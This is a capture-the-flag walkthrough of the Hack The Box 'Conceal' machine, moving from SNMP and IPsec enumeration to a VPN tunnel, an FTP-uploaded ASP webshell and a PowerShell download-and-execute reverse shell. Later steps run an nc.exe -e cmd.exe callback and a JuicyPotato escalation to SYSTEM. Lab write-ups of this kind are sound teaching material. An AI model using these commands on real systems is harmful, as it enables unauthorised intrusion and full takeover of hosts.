Hackthebox Conceal Walkthrough

Initial Enumeration
Port Scan
$ sudo nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.116
$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.116
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 19:46 EST
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are filtered
Nmap done: 1 IP address (1 host up) scanned in 130.18 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 19:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.16s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds
I also ran AutoRecon to confirm I had not missed anything. It took considerably longer (more than 40 minutes) and showed an additional UDP port, 161 (SNMP). Full results are uploaded [here](Rchitect/_top_100_udp_nmap.txt at Yoda · tcprks/Rchitect · GitHub). That leaves two services to enumerate: SNMP and ISAKMP.
SNMP Enumeration
The snmpwalk tool is pre-installed in Kali. Its output is long, and in this case only the first few lines (the system description and contact fields) carry useful information. Sample results are [here](Rchitect/snmpwalk-result at Yoda · tcprks/Rchitect · GitHub).
$ snmpwalk -c public -v 1 10.10.10.116
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (8552333) 23:45:23.33
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
The PSK hash exposed in the SNMP contact field can be cracked with the CrackStation website.

VPN (IKE) enumeration
Only the ISAKMP service (UDP port 500, used by IPsec VPNs) is open on the server. Kali Linux has built-in scanners for enumerating IPsec VPNs, such as ike-scan.
$ ike-scan -M 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=8ec1706b5f6632a8)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.4: 1 hosts scanned in 0.325 seconds (3.08 hosts/sec). 1 returned handshake; 0 returned notify
The results above show that the tunnel uses IKEv1. To confirm it is not running IKEv2:
$ ike-scan -M -2 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
Ending ike-scan 1.9.4: 1 hosts scanned in 2.594 seconds (0.39 hosts/sec). 0 returned handshake; 0 returned notify
Install strongSwan to create a tunnel between the Conceal machine and Kali:
$ sudo apt install strongswan
[sudo] password for rocky:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages will be upgraded:
strongswan
1 upgraded, 0 newly installed, 0 to remove and 1662 not upgraded.
Need to get 101 kB of archives.
After this operation, 3,072 B of additional disk space will be used.
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 strongswan all 5.9.5-2 [101 kB]
Fetched 101 kB in 2s (40.6 kB/s)
(Reading database ... 353790 files and directories currently installed.)
Preparing to unpack .../strongswan_5.9.5-2_all.deb ...
Unpacking strongswan (5.9.5-2) over (5.9.1-1) ...
Setting up strongswan (5.9.5-2) ...
The installation creates a config file, /etc/ipsec.conf. To establish the VPN connection we add a connection block to this file with the parameters enumerated by ike-scan. Note that ike-scan reports the SA lifetime in hex, which has to be converted to decimal seconds for the config.
$ sudo cat /etc/ipsec.conf
# ipsec.conf - strongSwan IPsec configuration file
# basic configuration
config setup
charondebug="all"
strictcrlpolicy=no
uniqueids = yes
# Add connections here.
# Sample VPN connections
conn rchitect-to-conceal
authby=secret
auto=add
ike=3des-sha1-modp1024!
esp=3des-sha1!
type=transport
keyexchange=ikev1
left=10.10.14.12
right=10.10.10.116
rightsubnet=10.10.10.116[tcp]
Add the PSK to /etc/ipsec.secrets in the same way:
$ sudo cat /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
10.10.14.12 10.10.10.116 : PSK "Dudecake1!"
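The mapping from the ike-scan handshake to the strongSwan connection block used above, including the hex lifetime conversion, as an added example (not code from the original post, from ike-scan or from strongSwan). The connection name, addresses and the choice to mirror the IKE ciphers in the ESP proposal are taken from this walkthrough's config; the AES/KeyLength and numeric-group handling generalises beyond what this box returned.

```python
"""Derive the strongSwan IKEv1 connection block from an ike-scan handshake.

Added example for this walkthrough (not code from the original post, from
ike-scan or from strongSwan). It parses the SA=(...) line exactly as ike-scan
prints it, converts the hex LifeDuration to seconds, and emits a conn block
shaped like the one used on this box.
"""
import re

# ike-scan numbers the DH group; strongSwan wants the modp name. Used only
# when ike-scan did not already print "Group=2:modp1024" style output.
GROUP_NAMES = {"1": "modp768", "2": "modp1024", "5": "modp1536", "14": "modp2048"}

# Constructed from the ike-scan -M output shown in this walkthrough.
IKE_SCAN_SA_LINE = (
    "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK "
    "LifeType=Seconds LifeDuration(4)=0x00007080)"
)


def parse_sa(line: str) -> dict:
    """Split 'SA=(k=v k=v ...)' into a dict; 'LifeDuration(4)' becomes 'LifeDuration'."""
    match = re.search(r"SA=\((.*)\)", line)  # greedy: the value list itself contains ')'
    if not match:
        raise ValueError("no SA=(...) block found")
    fields = {}
    for token in match.group(1).split():
        key, _, value = token.partition("=")
        fields[re.sub(r"\(\d+\)$", "", key)] = value
    return fields


def lifetime_seconds(fields: dict) -> int:
    """ike-scan prints LifeDuration as hex bytes (0x00007080); return decimal seconds."""
    if fields.get("LifeType", "Seconds") != "Seconds":
        raise ValueError("lifetime is not expressed in seconds")
    return int(fields["LifeDuration"], 16)


def human_lifetime(seconds: int) -> str:
    """strongSwan accepts '8h'; fall back to plain seconds when not a whole hour."""
    return f"{seconds // 3600}h" if seconds % 3600 == 0 else f"{seconds}s"


def strongswan_proposal(fields: dict) -> tuple:
    """Map ike-scan transform names to strongSwan's ike= and esp= keywords.

    The ESP proposal simply mirrors the IKE ciphers, which is the starting guess
    the walkthrough used; Phase 2 may need adjusting on other servers.
    """
    enc = fields["Enc"].lower()
    if enc == "aes":  # ike-scan prints the AES key size as a separate KeyLength field
        enc += fields.get("KeyLength", "128")
    integ = fields["Hash"].lower().replace("sha2-", "sha")
    group = fields["Group"]
    group = group.split(":", 1)[1] if ":" in group else GROUP_NAMES[group]
    return f"{enc}-{integ}-{group}!", f"{enc}-{integ}!"


def render_conn(name: str, left: str, right: str, fields: dict) -> str:
    """Emit the conn block for /etc/ipsec.conf. The trailing '!' pins the proposal
    so strongSwan offers exactly what ike-scan saw the peer accept."""
    if fields.get("Auth") != "PSK":
        raise ValueError(f"only PSK auth is handled here, got {fields.get('Auth')}")
    ike, esp = strongswan_proposal(fields)
    lines = [
        f"conn {name}",
        "    authby=secret",
        "    auto=add",
        f"    ike={ike}",
        f"    esp={esp}",
        "    type=transport",
        "    keyexchange=ikev1",
        f"    left={left}",
        f"    right={right}",
        f"    rightsubnet={right}[tcp]",
        "    fragmentation=yes",  # needed on this box for larger FTP uploads
        f"    ikelifetime={human_lifetime(lifetime_seconds(fields))}",
        "    closeaction=restart",
    ]
    return "\n".join(lines)


if __name__ == "__main__":
    sa = parse_sa(IKE_SCAN_SA_LINE)
    print(render_conn("rchitect-to-conceal", "10.10.14.12", "10.10.10.116", sa))
```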
VPN tunnel establishment
└─$ sudo ipsec start
[sudo] password for rocky:
Starting strongSwan 5.9.1 IPsec [starter]...
┌──(rocky㉿kali)-[~/hckbox/conceal]
└─$ sudo ipsec up rchitect-to-conceal
initiating Main Mode IKE_SA rchitect-to-conceal[2] to 10.10.10.116
The connection fails because one of the negotiated algorithms (3DES) is not supported by the strongSwan build on the Kali machine:
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
ENCRYPTION_ALGORITHM 3DES_CBC (key size 0) not supported!
key derivation for pre-shared key failed
generating INFORMATIONAL_V1 request 1886222546 [ HASH N(INVAL_KE) ]
Installing the additional plugin packages that provide these algorithms:
$ sudo apt install libstrongswan-standard-plugins libstrongswan-extra-plugins
Then reconnect after reviewing /etc/ipsec.conf and /etc/ipsec.secrets. The final versions of both files are shown below.
ipsec.secrets (final file)
10.10.14.12 10.10.10.116 : PSK "Dudecake1!"
ipsec.conf (final file)
config setup
charondebug="all"
strictcrlpolicy=no
uniqueids = yes
conn rchitect-to-conceal
authby=secret
auto=add
ike=3des-sha1-modp1024!
esp=3des-sha1!
type=transport
keyexchange=ikev1
left=10.10.14.12
right=10.10.10.116
rightsubnet=10.10.10.116[tcp]
fragmentation=yes
ikelifetime=8h
closeaction=restart
$ sudo ipsec start
Starting strongSwan 5.9.5 IPsec [starter]...
┌──(rocky㉿kali)-[~/hckbox/conceal]
└─$ sudo ipsec up rchitect-to-conceal
initiating Main Mode IKE_SA rchitect-to-conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (176 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA rchitect-to-conceal[1] established between 10.10.14.12[10.10.14.12]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 9817s
maximum IKE_SA lifetime 10357s
generating QUICK_MODE request 2535544478 [ HASH SA No ID ID ]
sending packet: from 10.10.14.12[500] to 10.10.10.116[500] (164 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.12[500] (188 bytes)
parsed QUICK_MODE response 2535544478 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA rchitect-to-conceal{1} established with SPIs cfaffc4f_i f5082174_o and TS 10.10.14.12/32 === 10.10.10.116/32[tcp]
connection 'rchitect-to-conceal' established successfully
└─$ sudo ipsec status rchitect-to-conceal
Security Associations (1 up, 0 connecting):
rchitect-to-conceal[1]: ESTABLISHED 9 seconds ago, 10.10.14.12[10.10.14.12]...10.10.10.116[10.10.10.116]
rchitect-to-conceal{1}: INSTALLED, TRANSPORT, reqid 1, ESP SPIs: cf332116_i fbc5fa16_o
rchitect-to-conceal{1}: 10.10.14.12/32 === 10.10.10.116/32[tcp]
If issues remain because of parameter mismatches, refer to this [blog](Setup a Site to Site IPsec VPN With Strongswan and PreShared Key Authentication - Ruan Bekker’s Blog).
Recon over IPsec VPN
The nmap port scan results once connected through the VPN:
└─$ sudo nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.116
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:40 EST
Warning: 10.10.10.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.116
Host is up (0.054s latency).
Not shown: 63985 closed ports, 1538 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
nmap -p 21,80,135,139,445,49664-49670 -Pn -sC -sV -oN detailed.txt 10.10.10.116
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:44 EST
Nmap scan report for 10.10.10.116
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-01T05:45:28
|_ start_date: 2022-02-28T00:21:39
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.45 seconds
$ sudo nmap -p 21,80,135,139,445,49664-49670 -script VULN 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:47 EST
Nmap scan report for 10.10.10.116
Host is up (0.054s latency).
PORT STATE SERVICE
21/tcp filtered ftp
80/tcp filtered http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49669/tcp filtered unknown
49670/tcp filtered unknown
Host script results:
| firewall-bypass:
|_ Firewall vulnerable to bypass through ftp helper. (IPv4)
$ sudo nmap -p 139,135,445 -script smb-enum-shares.nse 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.056s latency).
PORT STATE SERVICE
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds
┌──(rocky㉿kali)-[~/hckbox/conceal]
└─$ sudo nmap -p 135,139,445 -script smb-enum-users.nse 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-01 00:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.055s latency).
PORT STATE SERVICE
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.30 seconds
Anonymous FTP login is allowed. Once logged in there were no files, so as a test I uploaded a file.
$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> exit
421 Service not available, remote server has closed connection
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ echo "sample file rchitect" > test.txt
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> ^C
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
22 bytes sent in 0.00 secs (477.4305 kB/s)
ftp> exit
221 Goodbye.
The file uploaded successfully. To find where uploads land, I ran a basic gobuster scan against the web server, which found only one directory.
gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.116
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/01 01:10:42 Starting gobuster in directory enumeration mode
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
===============================================================
2022/03/01 01:11:19 Finished
===============================================================

Uploading a PHP reverse shell never completed, and a cmd.aspx file did not work either. The upload was slow, and only a shell of at most 100 bytes would go through.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdsimple.asp
local: cmdsimple.asp remote: cmdsimple.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
102 bytes sent in 0.00 secs (1.7370 MB/s)
ftp> exit
221 Goodbye.
I used a minimal command shell that fits within 100 bytes.

The size limit was caused by fragmentation not being enabled in the ipsec.conf we wrote. The config was changed to enable fragmentation:
$ sudo tail -10 /etc/ipsec.conf
ike=3des-sha1-modp1024!
esp=3des-sha1!
type=transport
keyexchange=ikev1
left=10.10.14.12
right=10.10.10.116
rightsubnet=10.10.10.116[tcp]
fragmentation=yes
ikelifetime=8h
closeaction=restart
I was still having trouble with uploads; this was resolved by reducing the MTU. The connection is IPsec running over the OpenVPN tunnel, so the additional encapsulation overhead explains the transfer issues. I changed the MTU to 1000 (a temporary change; after a reboot it returns to 1500).
┌──(rocky㉿kali)-[/opt]
└─$ sudo ifconfig tun0 mtu 1000
FTP transfers now complete smoothly. I used the webshell found here.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rchi.asp
local: rchi.asp remote: rchi.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1412 bytes sent in 0.00 secs (12.1314 MB/s)
ftp> exit
221 Goodbye.

Use Nishang's Invoke-PowerShellTcp PowerShell script to get the reverse shell. The tail of the script shows the invocation line that calls back to our listener:
$ tail -5 Invoke-PowerShellTcp.ps1
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
However, when I tried to access the same webshell, which had been reachable a minute earlier, it returned a 404 error.

It seems the uploaded files stop being accessible as soon as the FTP session is closed. So I decided to keep the FTP session open and start a Python web server from a different folder to serve the reverse shell script.
FTP upload under a new name (the session is left open):
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rchitect.asp
local: rchitect.asp remote: rchitect.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1412 bytes sent in 0.00 secs (16.8324 MB/s)
ftp>
Python web server in a separate directory:
┌──(rocky㉿kali)-[/opt/AutoRecon]
└─$ cd ~/hckbox/conceal/ftpdump/web
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
^C
Keyboard interrupt received, exiting.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ ls
Invoke-PowerShellTcp.ps1
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.116 - - [01/Mar/2022 20:36:40] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
Command run through the webshell to fetch and execute the reverse shell:
powershell "iex(new-object net.webclient).downloadString('http://10.10.14.12:8000/Invoke-PowerShellTcp.ps1')"
Netcat listener and reverse shell:
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49674
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv>
Privilege Escalation
Check the privileges of the current user:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv>
On most Windows machines, the privilege below can be abused using [JuicyPotato](Release Fresh potatoes · ohpe/juicy-potato · GitHub):
SeImpersonatePrivilege Impersonate a client after authentication Enabled
I tried uploading JuicyPotato over FTP in the same way as the reverse shell, but the server deleted the file immediately. So I decided to use an SMB server to copy it from Kali to Windows.
Issue while transferring the file via FTP:
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put JuicyPotato.exe
local: JuicyPotato.exe remote: JuicyPotato.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
348468 bytes sent in 0.39 secs (876.0975 kB/s)
ftp>
On Windows the file does not exist:
cd wwwroot
cd upload
ls
PS C:\inetpub\wwwroot\upload>
dir
ls
cp JuicyPotato.exe c:\users\Public
PS C:\inetpub\wwwroot\upload> cp : Cannot find path 'C:\inetpub\wwwroot\upload\JuicyPotato.exe' because it does not exist.
SMB share transfer between Linux and Windows:
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
On Windows:
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/10/2018 23:07 Administrator
d----- 12/10/2018 23:12 DefaultAppPool
d----- 12/10/2018 20:16 Destitute
d-r--- 12/10/2018 20:08 Public
d----- 12/10/2018 23:54 test
d----- 12/10/2018 23:40 WWW Anon Access
cd Destitute
cd Documents
net use \\10.10.14.12\share /u:df df
The command completed successfully.
copy \\10.10.14.12\share\JuicyPotato.exe JuicyPotato.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully
In my earlier experience, I had trouble running JuicyPotato from PowerShell; it is easier to get it to execute from a normal command prompt. So I copied nc.exe to Windows as well.
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ ls
Invoke-PowerShellTcp.ps1 JuicyPotato.exe nc.exe
On Windows
copy \\10.10.14.12\share\nc.exe nc.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
-a---- 03/03/2022 00:23 59392 nc.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully.
.\nc.exe -e cmd.exe 10.10.14.12 8989
This gives a normal command shell. Next, systeminfo shows the OS version, which is needed to choose a CLSID:
$ nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49679
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\Destitute\Documents>systeminfo
systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 02/03/2022, 00:21:13
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,060 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,211 MB
Virtual Memory: In Use: 988 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::e97c:8980:56ae:4cc9
[03]: dead:beef::7593:12e5:4a97:139c
[04]: dead:beef::69d7:5f30:5fa5:e0af
[05]: dead:beef::e97c:8980:56ae:4cc9
[06]: dead:beef::4d
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
First I tried without specifying a CLSID, which failed:
Directory of C:\Users\Destitute\Documents
03/03/2022 00:41 <DIR> .
03/03/2022 00:41 <DIR> ..
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
03/03/2022 00:41 56 rev.bat
3 File(s) 407,096 bytes
2 Dir(s) 9,699,618,816 bytes free
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555
JuicyPotato.exe -t * -p rev.bat -l 5555
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 5555
COM -> recv failed with error: 10038
I tried another CLSID from the list found here, and it also failed because the CLSID was wrong:
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
Testing {9E175B9C-F52A-11D8-B9A5-505054503030} 5555
COM -> recv failed with error: 10038
With the correct CLSID it works:
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
